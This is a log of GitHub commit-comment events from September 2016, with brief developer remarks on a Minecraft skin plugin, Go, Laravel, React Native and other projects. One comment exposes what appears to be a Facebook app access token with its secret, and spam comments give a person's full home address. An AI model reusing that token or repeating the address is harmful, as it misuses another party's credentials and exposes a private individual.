{"id":"4613388889","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161384,"position":null,"line":null,"path":null,"commit_id":"e99dae63e50240c3e4b89b275fc2e5250136aca9","created_at":"2016-09-25T00:04:57Z","updated_at":"2016-09-25T00:04:57Z","body":"lel"}},"created_at":"2016-09-25T00:04:57Z"}
{"id":"4613389507","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161386,"position":null,"line":null,"path":null,"commit_id":"e99dae63e50240c3e4b89b275fc2e5250136aca9","created_at":"2016-09-25T00:05:30Z","updated_at":"2016-09-25T00:05:30Z","body":"@KairusDarkSeeker I mean players without permission couldn't use it. :D"}},"created_at":"2016-09-25T00:05:30Z"}
{"id":"4613389643","type":"CommitCommentEvent","actor":{"login":"adeniltonbs"},"repo":{"name":"adeniltonbs/Zeus.Net.NFe.NFCe"},"payload":{"comment":{"id":19161387,"position":null,"line":null,"path":null,"commit_id":"8b9d9459a6de585a14ade85ed314af3478599ce7","created_at":"2016-09-25T00:05:40Z","updated_at":"2016-09-25T00:05:40Z","body":"Correção do issue https://github.com/adeniltonbs/Zeus.Net.NFe.NFCe/issues/204"}},"created_at":"2016-09-25T00:05:40Z"}
{"id":"4613389854","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161390,"position":null,"line":null,"path":null,"commit_id":"a1015588886dc85a6d7288fee10909f86ef25819","created_at":"2016-09-25T00:05:53Z","updated_at":"2016-09-25T00:05:53Z","body":"what, wait why?"}},"created_at":"2016-09-25T00:05:53Z"}
{"id":"4613391791","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161395,"position":null,"line":null,"path":null,"commit_id":"a1015588886dc85a6d7288fee10909f86ef25819","created_at":"2016-09-25T00:07:42Z","updated_at":"2016-09-25T00:07:42Z","body":"Just use a callable task instead"}},"created_at":"2016-09-25T00:07:42Z"}
{"id":"4613396980","type":"CommitCommentEvent","actor":{"login":"bogachev-pa"},"repo":{"name":"aurusov/raox-models"},"payload":{"comment":{"id":19161408,"position":440,"line":317,"path":"models/fms.rao","commit_id":"00cb0c6ed116ca6a84426dc78e21a72da08e0690","created_at":"2016-09-25T00:12:45Z","updated_at":"2016-09-25T00:12:45Z","body":"Я посмотрел, как задается фон.\r\nВ общем, в этом методе надо написать\r\n```java\r\nbackground = new Background(500, 500, RaoColor.WHITE)\r\n```"}},"created_at":"2016-09-25T00:12:45Z"}
{"id":"4613397938","type":"CommitCommentEvent","actor":{"login":"meepingsnesroms"},"repo":{"name":"libretro/dosbox-libretro"},"payload":{"comment":{"id":19161410,"position":null,"line":null,"path":null,"commit_id":"631adffc8978f6e96c654fb6e5bd27f2752f2b34","created_at":"2016-09-25T00:13:35Z","updated_at":"2016-09-25T00:13:35Z","body":"That line was added in Update 2.\r\nIt wasn't needed so I just removed it.\r\n(It worked fine but the android compiler was just being stupid again.)"}},"created_at":"2016-09-25T00:13:35Z"}
{"id":"4613398050","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161411,"position":null,"line":null,"path":null,"commit_id":"a1015588886dc85a6d7288fee10909f86ef25819","created_at":"2016-09-25T00:13:44Z","updated_at":"2016-09-25T00:13:44Z","body":"@KairusDarkSeeker What is the difference?"}},"created_at":"2016-09-25T00:13:44Z"}
{"id":"4613399927","type":"CommitCommentEvent","actor":{"login":"bogachev-pa"},"repo":{"name":"aurusov/raox-models"},"payload":{"comment":{"id":19161419,"position":447,"line":324,"path":"models/fms.rao","commit_id":"00cb0c6ed116ca6a84426dc78e21a72da08e0690","created_at":"2016-09-25T00:15:26Z","updated_at":"2016-09-25T00:15:26Z","body":"Кстати, для упрощения, можно запилить сигнатуру `drawText` с `Object` в качестве первого параметра и делать `toString()` внутри самого метода.\r\n"}},"created_at":"2016-09-25T00:15:26Z"}
{"id":"4613401224","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161422,"position":null,"line":null,"path":null,"commit_id":"a1015588886dc85a6d7288fee10909f86ef25819","created_at":"2016-09-25T00:16:37Z","updated_at":"2016-09-25T00:16:37Z","body":"@SalmonGER instead of using a spawnToAll function on a task, use it inside the plugin instead"}},"created_at":"2016-09-25T00:16:37Z"}
{"id":"4613401767","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161423,"position":null,"line":null,"path":null,"commit_id":"e99dae63e50240c3e4b89b275fc2e5250136aca9","created_at":"2016-09-25T00:17:07Z","updated_at":"2016-09-25T00:17:07Z","body":"@SalmonGER I didn't know that "}},"created_at":"2016-09-25T00:17:07Z"}
{"id":"4613403966","type":"CommitCommentEvent","actor":{"login":"gwanmin"},"repo":{"name":"gwanmin/opentutorials"},"payload":{"comment":{"id":19161428,"position":null,"line":null,"path":null,"commit_id":"204d497976d3c25adfdac5d59ed4be38fa7a26eb","created_at":"2016-09-25T00:19:13Z","updated_at":"2016-09-25T00:19:13Z","body":"changed"}},"created_at":"2016-09-25T00:19:13Z"}
{"id":"4613405194","type":"CommitCommentEvent","actor":{"login":"gupta-shantanu"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19161429,"position":null,"line":null,"path":null,"commit_id":"8f334d3ba66b87dd670752f850f4d14844b946cf","created_at":"2016-09-25T00:20:21Z","updated_at":"2016-09-25T00:20:21Z","body":"Pecisely 11 out of 70 entries were found on fb. Returned entries are cross checked with the locations that we already have. However, one of them was still wrongly identified (that entry has wrong values for other google fields too, so probably problem lies elsewhere) . \r\nMost of the places don't exist on fb (they mostly exist as pages or groups which are useless for our purpose). Nothing much can be done here.\r\nWhat do you suggest?\r\n\r\nAbout the error (my token has expired):\r\nreplace KEYS_FB=['EAAC....<<long access key>>....',]\r\nwith this: KEYS_FB=['1040517959329660|c7e458dd968fca33d05a18fddbcd86ab',]\r\nI'll make a permanent fix anyways in the next commit.\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-25T00:20:21Z"}
{"id":"4613406051","type":"CommitCommentEvent","actor":{"login":"rodrigocarrasco"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19161430,"position":null,"line":null,"path":null,"commit_id":"4ffd4a73a8d4e44b4cf78a32f16b46c004ac28cc","created_at":"2016-09-25T00:21:12Z","updated_at":"2016-09-25T00:21:12Z","body":"Thank you!"}},"created_at":"2016-09-25T00:21:12Z"}
{"id":"4613408332","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161434,"position":null,"line":null,"path":null,"commit_id":"a1015588886dc85a6d7288fee10909f86ef25819","created_at":"2016-09-25T00:23:24Z","updated_at":"2016-09-25T00:23:24Z","body":"@KairusDarkSeeker well the issue is that the skin wasn't changed in other players sight without a delay between setSkin() and spawnToAll()"}},"created_at":"2016-09-25T00:23:24Z"}
{"id":"4613410603","type":"CommitCommentEvent","actor":{"login":"thirdman"},"repo":{"name":"khanhhaduc/version-5"},"payload":{"comment":{"id":19161438,"position":null,"line":null,"path":null,"commit_id":"3afe1f7a1fe2950165e913daa6af17d36ee4cc34","created_at":"2016-09-25T00:25:37Z","updated_at":"2016-09-25T00:25:37Z","body":"Also, to see this you can look at the /agreements/1234 overview page - hovering the mini timeline on the right shows a tooltip"}},"created_at":"2016-09-25T00:25:37Z"}
{"id":"4613413064","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161448,"position":null,"line":null,"path":null,"commit_id":"919c2fec58bd9a0e02ed62b5cf5dbba52f901696","created_at":"2016-09-25T00:28:06Z","updated_at":"2016-09-25T00:28:06Z","body":"Are you still working on it?\r\nIf not, we should implement that better, it still tries to use the old task\r\n`Fatal error: Uncaught ClassNotFoundException: Class SalmonDE\\Tasks\\ShowPlayerTask not found in phar://D:/Minecraft/Server/PocketMine-MP/ClearSky.phar/src/spl/BaseClassLoader.php:128\r\n`"}},"created_at":"2016-09-25T00:28:06Z"}
{"id":"4613416757","type":"CommitCommentEvent","actor":{"login":"rsoni20"},"repo":{"name":"rsoni20/Notes"},"payload":{"comment":{"id":19161451,"position":null,"line":null,"path":null,"commit_id":"c0da66a741683204806c411c12c3cae0c04e1bb4","created_at":"2016-09-25T00:31:53Z","updated_at":"2016-09-25T00:31:53Z","body":"#Not Application\r\n"}},"created_at":"2016-09-25T00:31:53Z"}
{"id":"4613417261","type":"CommitCommentEvent","actor":{"login":"fred2028"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19161452,"position":null,"line":null,"path":null,"commit_id":"381a0051c7ec5bde4c35967e336050c8dca6a677","created_at":"2016-09-25T00:32:15Z","updated_at":"2016-09-25T00:32:15Z","body":"To close it, you have to re-set the data source state variable with openRow to null. For example\r\n```\r\nthis.setState({\r\n      dataSource: this.state.dataSource.setOpenRowID(null),\r\n    });\r\n```\r\n\r\nThe latest version of swipeablelistview should do this in its onscroll handler"}},"created_at":"2016-09-25T00:32:15Z"}
{"id":"4613418245","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161454,"position":null,"line":null,"path":null,"commit_id":"919c2fec58bd9a0e02ed62b5cf5dbba52f901696","created_at":"2016-09-25T00:33:12Z","updated_at":"2016-09-25T00:33:12Z","body":"Yes, just wait @SalmonGER"}},"created_at":"2016-09-25T00:33:12Z"}
{"id":"4613418823","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161456,"position":null,"line":null,"path":null,"commit_id":"a1015588886dc85a6d7288fee10909f86ef25819","created_at":"2016-09-25T00:33:39Z","updated_at":"2016-09-25T00:33:39Z","body":"I know, that's what I used on my skin stealer but without a task @SalmonGER"}},"created_at":"2016-09-25T00:33:39Z"}
{"id":"4613421043","type":"CommitCommentEvent","actor":{"login":"yinmengyin"},"repo":{"name":"JacksonTian/fks"},"payload":{"comment":{"id":19161460,"position":null,"line":null,"path":null,"commit_id":"5f4d583c434af889b29839a375b988320f6f2401","created_at":"2016-09-25T00:35:30Z","updated_at":"2016-09-25T00:35:30Z","body":"Hello, Jackson,\r\n\r\nI am just wondering what software you used to make this figure.  Thank you."}},"created_at":"2016-09-25T00:35:30Z"}
{"id":"4613422944","type":"CommitCommentEvent","actor":{"login":"technotherion"},"repo":{"name":"technotherion/PlayerLookingAt"},"payload":{"comment":{"id":19161468,"position":null,"line":null,"path":null,"commit_id":"cd8be155e74c3a7dca0f23a02be6d96394ca79b2","created_at":"2016-09-25T00:36:58Z","updated_at":"2016-09-25T00:36:58Z","body":"Still need to do:\r\n\r\nmake a PlayerLookingAtOld.cs for Microverse so that Microverse still works\r\n\r\nRemove references to Microverse for cleaner code\r\n\r\nHave Trigger objects enable blue aura\r\n\r\nHave Locked objects enable red aura\r\n\r\nHave Trigger objects call the object's script after 2.5 seconds of sustained looking at.\r\n\r\n"}},"created_at":"2016-09-25T00:36:58Z"}
{"id":"4613426158","type":"CommitCommentEvent","actor":{"login":"ClockSelect"},"repo":{"name":"MicroSur/myevic"},"payload":{"comment":{"id":19161483,"position":null,"line":null,"path":null,"commit_id":"4f38c9f6571fed1f6b1a6fa13916afa71b06ba08","created_at":"2016-09-25T00:40:13Z","updated_at":"2016-09-25T00:40:13Z","body":"That's correct.\r\nFor TEMP modes, you'll have to compute positions by hand form caracter size; cumbersome, but not a big deal."}},"created_at":"2016-09-25T00:40:13Z"}
{"id":"4613427491","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"zypeh/koa-better-body"},"payload":{"comment":{"id":19161494,"position":4,"line":37,"path":"utils.js","commit_id":"eb33c5b222d2da71dd677f52b7c91634b857ff3b","created_at":"2016-09-25T00:41:34Z","updated_at":"2016-09-25T00:41:34Z","body":"it should be before `require = fn`"}},"created_at":"2016-09-25T00:41:34Z"}
{"id":"4613428630","type":"CommitCommentEvent","actor":{"login":"kdaniti"},"repo":{"name":"kdaniti/CodinGame_Hypersonic_Python"},"payload":{"comment":{"id":19161499,"position":null,"line":null,"path":null,"commit_id":"0dc9203eb1afa139bea3480fdff911e26fba86fc","created_at":"2016-09-25T00:42:43Z","updated_at":"2016-09-25T00:42:43Z","body":"Board added"}},"created_at":"2016-09-25T00:42:43Z"}
{"id":"4613429897","type":"CommitCommentEvent","actor":{"login":"hannahmbanana"},"repo":{"name":"hannahmbanana/ios-snapshot-test-case"},"payload":{"comment":{"id":19161501,"position":null,"line":null,"path":null,"commit_id":"c3a76000b4923089cd80a9ba90dbfe23c7ed3729","created_at":"2016-09-25T00:44:03Z","updated_at":"2016-09-25T00:44:03Z","body":"@appleguy pointed out that they recently dropped iOS 7: https://github.com/facebook/ios-snapshot-test-case/issues/196"}},"created_at":"2016-09-25T00:44:03Z"}
{"id":"4613434583","type":"CommitCommentEvent","actor":{"login":"maqdev"},"repo":{"name":"hypertino/ScalaMock"},"payload":{"comment":{"id":19161507,"position":null,"line":null,"path":null,"commit_id":"5162296d259dedfa9c39d7f186109a23f3e40ae9","created_at":"2016-09-25T00:49:00Z","updated_at":"2016-09-25T00:49:00Z","body":"This is #56 from upstream"}},"created_at":"2016-09-25T00:49:00Z"}
{"id":"4613436143","type":"CommitCommentEvent","actor":{"login":"aravergar"},"repo":{"name":"aravergar/IG"},"payload":{"comment":{"id":19161510,"position":null,"line":null,"path":null,"commit_id":"c7b081dbc62ef2fa0aba950f2da8049216df864f","created_at":"2016-09-25T00:50:36Z","updated_at":"2016-09-25T00:50:36Z","body":"Se da por terminada la implementación de los modos de visualización.\r\n\r\nclose #4 "}},"created_at":"2016-09-25T00:50:36Z"}
{"id":"4613438341","type":"CommitCommentEvent","actor":{"login":"AOA1USA"},"repo":{"name":"AOA1USA/Practice-Code"},"payload":{"comment":{"id":19161512,"position":2,"line":2,"path":"README.md","commit_id":"14b0b84eba2fe1e62b9ae7dd1b3f558af18b71f0","created_at":"2016-09-25T00:52:49Z","updated_at":"2016-09-25T00:52:49Z","body":" <!DOCTYPE html>\r\n<html>\r\n<head>\r\n<title>Page Title</title>\r\n</head>\r\n<body>\r\n\r\n<h1>My First Heading</h1>\r\n<p>My first paragraph.</p>\r\n\r\n</body>\r\n</html> "}},"created_at":"2016-09-25T00:52:49Z"}
{"id":"4613441951","type":"CommitCommentEvent","actor":{"login":"odininon"},"repo":{"name":"Darkhax-Minecraft/Enchanting-Plus"},"payload":{"comment":{"id":19161520,"position":null,"line":null,"path":null,"commit_id":"9f3fce5f15f14b710fb918593fe5b086f5441544","created_at":"2016-09-25T00:56:35Z","updated_at":"2016-09-25T00:56:35Z","body":"Awesome!"}},"created_at":"2016-09-25T00:56:35Z"}
{"id":"4613450230","type":"CommitCommentEvent","actor":{"login":"SoScared"},"repo":{"name":"OpenRA/OpenRA"},"payload":{"comment":{"id":19161544,"position":null,"line":null,"path":null,"commit_id":"86ad7576cefa51e7fcb1042af546b703bed2b002","created_at":"2016-09-25T01:04:57Z","updated_at":"2016-09-25T01:04:57Z","body":"Turnspeed reduction (2 from 3) adressing targeting behaviour vs idling YAKs/MiGs. Issue mostly visual.\r\nIf possible, a better solution would be for trait https://github.com/OpenRA/OpenRA/wiki/Traits#attackfrontal to allow the SubMissileAA weapon to fire from ca. 30 degrees off it's front facing the target, and retain the normal SubMissiles requirement of having the unit directly facing the target."}},"created_at":"2016-09-25T01:04:57Z"}
{"id":"4613450495","type":"CommitCommentEvent","actor":{"login":"sheressa"},"repo":{"name":"sheressa/DevelDesk"},"payload":{"comment":{"id":19161545,"position":null,"line":null,"path":null,"commit_id":"c0cf64ab9a8fbb38abb8f4dd62e5886fe513c648","created_at":"2016-09-25T01:05:12Z","updated_at":"2016-09-25T01:05:12Z","body":"commit index.html for DevelDesk GitHub Pages"}},"created_at":"2016-09-25T01:05:12Z"}
{"id":"4613450841","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161546,"position":null,"line":null,"path":null,"commit_id":"3367c4a6ef81d42be665dbc36177b75a937cf262","created_at":"2016-09-25T01:05:30Z","updated_at":"2016-09-25T01:05:30Z","body":"But tjis way you still use a task?"}},"created_at":"2016-09-25T01:05:30Z"}
{"id":"4613454424","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19161553,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-25T01:09:06Z","updated_at":"2016-09-25T01:09:06Z","body":"idもバインドして、正常に動作するようです。こちらもプッシュさせて頂きます。\r\n78ac38f03f7e092a9b4064e8e870f7a4cdb91e70\r\n\r\n＞こちら、書き間違いが原因で発生しているのか、理解に詰まっているなど他に原因があるのか\r\n＞どちらになりますでしょうか。\r\n\r\nこちらは書き間違いになりますが、理解が追いついていない箇所もあると思います。\r\nまた、初めてこちらの課題に取り組んでからかなり時間が空いてしまっているので、初期の頃に記載したものorそれを引用してきたものはこのような間違いがあるかもしれません。見直しをしなければ行けないです…。\r\n\r\nその他私の学習の進め方の問題点や、コードを御覧頂いて理解していないのでは、と思われるところはございますでしょうか。\r\n宜しくお願い申し上げます。"}},"created_at":"2016-09-25T01:09:06Z"}
{"id":"4613458191","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/dosbox-libretro"},"payload":{"comment":{"id":19161559,"position":192,"line":399,"path":"src/shell/shell.cpp","commit_id":"1b35508c1c49a377dbf353906985aa1b395bd361","created_at":"2016-09-25T01:12:54Z","updated_at":"2016-09-25T01:12:54Z","body":"Hi @meepingsnesroms , you need to readd the VITA ifdefs here, the Vita port currently doesn't compile."}},"created_at":"2016-09-25T01:12:54Z"}
{"id":"4613459477","type":"CommitCommentEvent","actor":{"login":"hellais"},"repo":{"name":"TheTorProject/lepidopter"},"payload":{"comment":{"id":19161560,"position":null,"line":null,"path":null,"commit_id":"e24b00fc613d177cc1ca935a5e073337384f04fa","created_at":"2016-09-25T01:14:17Z","updated_at":"2016-09-25T01:14:17Z","body":"You also need to bump the version of lepidopter_updater otherwise it will redownload it."}},"created_at":"2016-09-25T01:14:17Z"}
{"id":"4613459914","type":"CommitCommentEvent","actor":{"login":"hellais"},"repo":{"name":"TheTorProject/lepidopter"},"payload":{"comment":{"id":19161561,"position":null,"line":null,"path":null,"commit_id":"e24b00fc613d177cc1ca935a5e073337384f04fa","created_at":"2016-09-25T01:14:44Z","updated_at":"2016-09-25T01:14:44Z","body":"https://github.com/TheTorProject/lepidopter/blob/master/lepidopter-fh/etc/lepidopter-update/version needs to say 2 (with no newline)"}},"created_at":"2016-09-25T01:14:44Z"}
{"id":"4613461736","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19161562,"position":null,"line":null,"path":null,"commit_id":"faa22f39c6fe5bb0c637b904a90749b9d19ac5bd","created_at":"2016-09-25T01:16:38Z","updated_at":"2016-09-25T01:16:38Z","body":":+1: "}},"created_at":"2016-09-25T01:16:38Z"}
{"id":"4613465186","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19161565,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-25T01:20:09Z","updated_at":"2016-09-25T01:20:09Z","body":"The [Comparison Operators](https://golang.org/ref/spec#Comparison_operators) section of the spec provides the exact rules for how `==` is applied in the case of pointers and interfaces. They are quoted below:\r\n\r\n* Pointer values are comparable. Two pointer values are equal if they point to the same variable or if both have value nil.\r\n* Interface values are comparable. Two interface values are equal if they have identical dynamic types and equal dynamic values or if both have value nil.\r\n\r\nFor your use case, I'm not sure which one you want without know what you're trying to implement."}},"created_at":"2016-09-25T01:20:09Z"}
{"id":"4613465784","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19161569,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-25T01:20:44Z","updated_at":"2016-09-25T01:20:44Z","body":"As a tip, I would just try and use `==` and see where it fails and then re-evaluate the approach."}},"created_at":"2016-09-25T01:20:44Z"}
{"id":"4613469384","type":"CommitCommentEvent","actor":{"login":"mamaqiang"},"repo":{"name":"MannixXia/hello-world"},"payload":{"comment":{"id":19161578,"position":null,"line":null,"path":null,"commit_id":"7a8e59cad4d77366304406acef2cb6ea16d81403","created_at":"2016-09-25T01:24:31Z","updated_at":"2016-09-25T01:24:31Z","body":"hh"}},"created_at":"2016-09-25T01:24:31Z"}
{"id":"4613473800","type":"CommitCommentEvent","actor":{"login":"CarlosNihelton"},"repo":{"name":"CarlosNihelton/kdev-clang-tidy"},"payload":{"comment":{"id":19161589,"position":null,"line":null,"path":null,"commit_id":"cded82e7421aa3e6986bfa19f796558e80639507","created_at":"2016-09-25T01:29:04Z","updated_at":"2016-09-25T01:29:04Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Issue #2: Make sure Parsers don't throw exception](https://trello.com/c/NcyEv1N0/4-issue-2-make-sure-parsers-don-t-throw-exception)"}},"created_at":"2016-09-25T01:29:04Z"}
{"id":"4613475167","type":"CommitCommentEvent","actor":{"login":"Shohelsarker53"},"repo":{"name":"Shohelsarker53/laughing-winner"},"payload":{"comment":{"id":19161593,"position":1,"line":1,"path":".gitignore","commit_id":"05997a75aa641a17ad4303ad9fd58d5fa908c882","created_at":"2016-09-25T01:30:27Z","updated_at":"2016-09-25T01:30:27Z","body":"I have needed to confirmations receiving my winner prizes money form to direct my eligibility to  citizenship into US Passport and card into my shipping address information on ?"}},"created_at":"2016-09-25T01:30:27Z"}
{"id":"4613477717","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"Jim00000/phonebook"},"payload":{"comment":{"id":19161604,"position":null,"line":null,"path":null,"commit_id":"a31f52d561d919e2a73377505b4aff153248dc70","created_at":"2016-09-25T01:33:05Z","updated_at":"2016-09-25T01:33:05Z","body":"It is not so-called \"shared memory\". Use better terminologies."}},"created_at":"2016-09-25T01:33:05Z"}
{"id":"4613480083","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"NuLogicSystems/PKGBUILD"},"payload":{"comment":{"id":19161608,"position":null,"line":null,"path":null,"commit_id":"420443b9dff8a720631e41d47fe955e3e12c1450","created_at":"2016-09-25T01:35:37Z","updated_at":"2016-09-25T01:35:37Z","body":"Something strange going on with copy and paste, I will need to look into this."}},"created_at":"2016-09-25T01:35:37Z"}
{"id":"4613481092","type":"CommitCommentEvent","actor":{"login":"SoScared"},"repo":{"name":"OpenRA/OpenRA"},"payload":{"comment":{"id":19161610,"position":null,"line":null,"path":null,"commit_id":"86ad7576cefa51e7fcb1042af546b703bed2b002","created_at":"2016-09-25T01:36:41Z","updated_at":"2016-09-25T01:36:41Z","body":"Also this commit brings with it the altered Speed + Angle proposed in the predecessing balance PR #12040. Originally it was altered to address visually the AA capability of the projectile:bullet but it also had the side effect of being more visually pleasing compared to the very high altitude path of the projectie. With no objections I'd want to bring it along with the next Missile Sub PR."}},"created_at":"2016-09-25T01:36:41Z"}
{"id":"4613484617","type":"CommitCommentEvent","actor":{"login":"ErikBoesen"},"repo":{"name":"frc1418/VictiScout-Server"},"payload":{"comment":{"id":19161616,"position":null,"line":null,"path":null,"commit_id":"8e309f18e895767dfe6182e5d1ed34d73feb398b","created_at":"2016-09-25T01:40:32Z","updated_at":"2016-09-25T01:40:32Z","body":"That was the trashiest commit name ever. Won't do it again."}},"created_at":"2016-09-25T01:40:32Z"}
{"id":"4613484637","type":"CommitCommentEvent","actor":{"login":"Shohelsarker53"},"repo":{"name":"Shohelsarker53/laughing-winner"},"payload":{"comment":{"id":19161617,"position":1,"line":1,"path":"LICENSE","commit_id":"05997a75aa641a17ad4303ad9fd58d5fa908c882","created_at":"2016-09-25T01:40:33Z","updated_at":"2016-09-25T01:40:33Z","body":"I have needed to confirmations receiving my  winners +MIT license receiving into my shipping address information on? \r\nName: shohel sarker\r\nAddress:  30 faidabd sukkur ali moszid Roo, Faidabad , po faydabad Madrasha Daskhinkhan, Dhaka  1230 Bangladeshi\r\n"}},"created_at":"2016-09-25T01:40:33Z"}
{"id":"4613487560","type":"CommitCommentEvent","actor":{"login":"rebroad"},"repo":{"name":"bitcoinknots/bitcoin"},"payload":{"comment":{"id":19161619,"position":null,"line":null,"path":null,"commit_id":"5a716a3bc6621e4d2e2c1de5b6b5596d6877d589","created_at":"2016-09-25T01:43:25Z","updated_at":"2016-09-25T01:43:25Z","body":"what is the impact of this change?"}},"created_at":"2016-09-25T01:43:25Z"}
{"id":"4613487904","type":"CommitCommentEvent","actor":{"login":"msgimanila"},"repo":{"name":"msgimanila/LavShop"},"payload":{"comment":{"id":19161621,"position":2,"line":2,"path":"README.md","commit_id":"ce43e6c88324c47fb3811b8a47c58acbbad34e48","created_at":"2016-09-25T01:43:46Z","updated_at":"2016-09-25T01:43:46Z","body":"-"}},"created_at":"2016-09-25T01:43:46Z"}
{"id":"4613491734","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19161629,"position":null,"line":null,"path":null,"commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-25T01:47:51Z","updated_at":"2016-09-25T01:47:51Z","body":"Ah, okay, I went to google this and [this explanation](https://laracasts.com/discuss/channels/eloquent/eloquent-relation-isset-always-return-false) makes sense. So the solution is to use `relationLoaded` instead of `isset`?\r\n\r\n> \r\n> That's happening because laravel uses magic method __call to determine what to do in case of someone accessing an attribute that doesn't exist. Think about it, did you add a deposit attribute to your model? You didn't. You've only added a deposit() method to your model.\r\n> \r\n> Laravel is smart enough to know that when you are accessing the depposit variable you want to get the relationship. Behind the scenes it converts your call to something like:\r\n> \r\n> `$model->deposit()->get();`\r\n>\r\n> Anyways, the reason you get false is because there is no such an attribute deposit on the model.\r\n> \r\n> Even after loading the relationship once, accessing the attribute will just fetch is from a cached version stored on the object and if you check there again whether the variable is set or not, you will get false again, as the cached data is stored under a global relationship array ($relations) on the model.\r\n> \r\n> To check if your relationship is loaded you can use the relationLoaded method:\r\n> \r\n> `$this->relationLoaded('deposit')`"}},"created_at":"2016-09-25T01:47:51Z"}
{"id":"4613492319","type":"CommitCommentEvent","actor":{"login":"aaylward"},"repo":{"name":"steveash/jopenfst"},"payload":{"comment":{"id":19161632,"position":37,"line":64,"path":"src/main/java/com/github/steveash/jopenfst/utils/FstUtils.java","commit_id":"2ee354788d10cdfc192b7df44051f38775fb0b96","created_at":"2016-09-25T01:48:30Z","updated_at":"2016-09-25T01:48:30Z","body":"Thanks for the reply Steve -- I'm just interested :) Cool project!"}},"created_at":"2016-09-25T01:48:30Z"}
{"id":"4613494649","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19161636,"position":null,"line":null,"path":null,"commit_id":"b7842dd84d5e80badf6dd385aacd6fe24ec586fe","created_at":"2016-09-25T01:51:05Z","updated_at":"2016-09-25T01:51:05Z","body":"#10 "}},"created_at":"2016-09-25T01:51:05Z"}
{"id":"4613495120","type":"CommitCommentEvent","actor":{"login":"icyfunny"},"repo":{"name":"icyfunny/hello-world"},"payload":{"comment":{"id":19161639,"position":null,"line":null,"path":null,"commit_id":"cfadce46f4d00e253eca05d4399f4ee96c5395c8","created_at":"2016-09-25T01:51:33Z","updated_at":"2016-09-25T01:51:33Z","body":"comment"}},"created_at":"2016-09-25T01:51:33Z"}
{"id":"4613495127","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19161640,"position":null,"line":null,"path":null,"commit_id":"b2b3efa75347e2e155b34cda06416ace052db1cd","created_at":"2016-09-25T01:51:34Z","updated_at":"2016-09-25T01:51:34Z","body":"#10 "}},"created_at":"2016-09-25T01:51:34Z"}
{"id":"4613495239","type":"CommitCommentEvent","actor":{"login":"namddanh"},"repo":{"name":"kthbnflr/cps633-lab1"},"payload":{"comment":{"id":19161641,"position":7,"line":6,"path":"README.md","commit_id":"3a7993a3fec46b66806a52a18f7dc58b51901d13","created_at":"2016-09-25T01:51:40Z","updated_at":"2016-09-25T01:51:40Z","body":"lit"}},"created_at":"2016-09-25T01:51:40Z"}
{"id":"4613498002","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19161646,"position":null,"line":null,"path":null,"commit_id":"77b9f655d7071b35e9fcfcd80c9b689f4b678122","created_at":"2016-09-25T01:54:41Z","updated_at":"2016-09-25T01:54:41Z","body":"#11 "}},"created_at":"2016-09-25T01:54:41Z"}
